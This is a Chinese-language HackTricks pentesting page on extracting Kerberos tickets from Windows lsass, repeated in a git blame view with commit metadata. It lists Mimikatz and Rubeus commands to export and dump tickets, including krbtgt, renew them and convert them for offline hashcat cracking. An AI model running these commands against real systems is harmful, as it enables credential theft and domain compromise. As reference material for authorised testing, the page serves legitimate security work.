hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md

# 从Windows中获取票据

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>

Windows中的票据由**lsass**（本地安全性机构子系统服务）进程管理和存储，负责处理安全策略。要提取这些票据，需要与lsass进程进行交互。非管理员用户只能访问自己的票据，而管理员有权限提取系统上的所有票据。对于这样的操作，通常使用**Mimikatz**和**Rubeus**工具，它们分别提供不同的命令和功能。

### Mimikatz
Mimikatz是一个多功能工具，可以与Windows安全进行交互。它不仅用于提取票据，还用于各种其他与安全相关的操作。
```bash
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```
### Rubeus
Rubeus是一款专门针对Kerberos交互和操作的工具。它用于票据提取和处理，以及其他与Kerberos相关的活动。
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
在使用这些命令时，请确保将类似 `<BASE64_TICKET>` 和 `<luid>` 这样的占位符替换为实际的Base64编码票证和登录ID。这些工具提供了广泛的功能，用于管理票证并与Windows的安全机制进行交互。

# 参考资料
* **[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# 从Windows中获取票据
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['network-services-pentesting/1521-1522-1529-pentesting-oracl

											
										
										
											2024-01-05 23:28:30 +00:00
+								支持HackTricks的其他方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
 								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								Windows中的票据由**lsass**（本地安全性机构子系统服务）进程管理和存储，负责处理安全策略。要提取这些票据，需要与lsass进程进行交互。非管理员用户只能访问自己的票据，而管理员有权限提取系统上的所有票据。对于这样的操作，通常使用**Mimikatz**和**Rubeus**工具，它们分别提供不同的命令和功能。
 								### Mimikatz
 								Mimikatz是一个多功能工具，可以与Windows安全进行交互。它不仅用于提取票据，还用于各种其他与安全相关的操作。
-												GitBook: [#3372] No subject

											
										
										
											2022-08-13 23:06:40 +00:00
+								```bash
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# Extracting tickets using Mimikatz
-												GitBook: [#3372] No subject

											
										
										
											2022-08-13 23:06:40 +00:00
+								sekurlsa::tickets /export
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								```
 								### Rubeus
 								Rubeus是一款专门针对Kerberos交互和操作的工具。它用于票据提取和处理，以及其他与Kerberos相关的活动。
 								```bash
 								# Dumping all tickets using Rubeus
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								.\Rubeus dump
 								[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# Listing all tickets
-												GitBook: [#3372] No subject

											
										
										
											2022-08-13 23:06:40 +00:00
+								.\Rubeus.exe triage
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
 								# Dumping a specific ticket by LUID
-												GitBook: [#3372] No subject

											
										
										
											2022-08-13 23:06:40 +00:00
+								.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
 								[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# Renewing a ticket
 								.\Rubeus.exe renew /ticket:<BASE64_TICKET>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# Converting a ticket to hashcat format for offline cracking
 								.\Rubeus.exe hash /ticket:<BASE64_TICKET>
 								```
 								在使用这些命令时，请确保将类似 `<BASE64_TICKET>` 和 `<luid>` 这样的占位符替换为实际的Base64编码票证和登录ID。这些工具提供了广泛的功能，用于管理票证并与Windows的安全机制进行交互。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-02-05 02:56:36 +00:00
+								# 参考资料
 								* **[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**